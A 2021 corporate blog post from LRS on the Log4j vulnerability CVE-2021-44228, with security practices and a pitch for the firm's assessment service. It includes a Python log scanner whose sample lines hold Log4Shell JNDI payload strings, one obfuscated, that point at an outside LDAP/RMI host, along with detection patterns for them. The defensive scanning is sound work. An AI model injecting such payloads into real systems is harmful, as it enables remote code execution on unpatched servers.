Exploits and Vulnerabilities
Wednesday, December 15, 2021
by Guy Tucker
As each year goes by, I field more and more questions about the very real menace of common vulnerabilities and exposures, or CVEs for short. I read about large corporations being shut down by ransomware, trojan horses or viruses every day. Individuals are worried. Corporations are worried. Hospitals and governments are worried. And of course, software companies are worried.
Just this week, the world learned about a vulnerability in the Log4j logging library, CVE-2021-44228. With this exploit, a simple logging mechanism can enable a hacker to insert their own code into a process and execute it remotely. This one is frightening. According to the CVE description, simply writing a line of text to a log can open the door. Software products need to write log entries for many legitimate reasons, so the nature of this exploit makes it both difficult to detect and tough to prevent.
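Because the trigger is a string that reaches a log statement (Log4j expands `${...}` lookup expressions inside logged messages), one defensive step is to scan existing logs for that lookup syntax. The following is an added example, not code from the original post or from LRS: it normalizes the nested lookups used to disguise the token and flags matching lines in a constructed sample of web-server log entries.

```python
import re
from typing import List, Tuple

# Constructed sample log lines (TEST-NET addresses, not real traffic).
# Lines 2 and 3 carry lookup syntax in the User-Agent field; 1 and 4 are benign.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [15/Dec/2021:10:02:11] "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [15/Dec/2021:10:02:12] "GET /login HTTP/1.1" 200 "${jndi:ldap://198.51.100.7/a}"',
    '10.0.0.9 - - [15/Dec/2021:10:02:13] "GET /api HTTP/1.1" 200 "${${lower:j}ndi:rmi://198.51.100.7/b}"',
    '10.0.0.2 - - [15/Dec/2021:10:02:14] "GET /docs HTTP/1.1" 200 "curl/7.79"',
]

# Inner lookups that hide the "jndi" token from naive string matching.
# Resolving them from the inside out restores the plain form so one check suffices.
_LOWER_UPPER = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_VALUE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")  # ${name:-fallback} -> fallback
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Collapse nested lower/upper/default-value lookups until nothing changes."""
    for _ in range(max_rounds):
        resolved = _LOWER_UPPER.sub(r"\1", text)
        resolved = _DEFAULT_VALUE.sub(r"\1", resolved)
        if resolved == text:
            break
        text = resolved
    return text


def contains_jndi_lookup(line: str) -> bool:
    """True if the line, after normalization, contains a JNDI lookup expression."""
    return _JNDI_LOOKUP.search(normalize_lookups(line)) is not None


def scan_log_lines(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (1-based line number, line) for every line that should be investigated."""
    return [(n, line) for n, line in enumerate(lines, start=1) if contains_jndi_lookup(line)]


if __name__ == "__main__":
    for number, line in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {number}: {line}")
```

A hit means the string reached your logs, not that the application was vulnerable; confirm the Log4j version on the affected host before escalating.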
The good news is that LRS products are not vulnerable to CVE-2021-44228, giving our customers one less exposure to worry about. A lucky thing, as there are many other critical systems they will need to protect.
Software companies constantly guard against malware attacks of all kinds. LRS developers remain very aware of paths to vulnerability and take a number of steps to avoid becoming the target of malicious exploits. Some of these measures include:
- Following industry best practices when writing product code, such as encryption at rest and encryption in transit for all inter-process data.
- The use of best-of-breed software to scan our source code and avoid pitfalls.
- Adoption of the BSIMM model of Systems Security Development and Maturity.
- Continuous dynamic, static and penetration scanning and testing throughout the development process.
- Adoption of Zero-Trust methods of transport to ensure safety.
- Avoidance of operating system print spooling mechanisms, which are highly susceptible to both attack and failure (PrintNightmare and its many friends).
- Constant monitoring of reported exploits to make sure our practices are effective.
There are steps you can take to help both you and your company in this area as well. Most of these you will have heard of, but it never hurts to remind others in your IT and user communities. To follow industry best practices, make sure to:
- Never open an attachment from a source you don’t know.
- Always stay current on operating system patches.
- Keep your LRS (and non-LRS) products as current as you are comfortable with.
- Consider adoption of Zero-Trust methods in your organization.
A more proactive approach to consider is a third-party security assessment by an external services firm. One such security provider is LRS IT Solutions, specifically their Foundational Cyber Risk Analysis offering. From vulnerability scanning to firewall configuration and penetration testing, they stand ready to act as a trusted outside advisor.
Printing can be challenging in a Zero Trust environment, but LRS has the tools and experience to make this a reality. Considering the alternative, it is certainly worth the effort.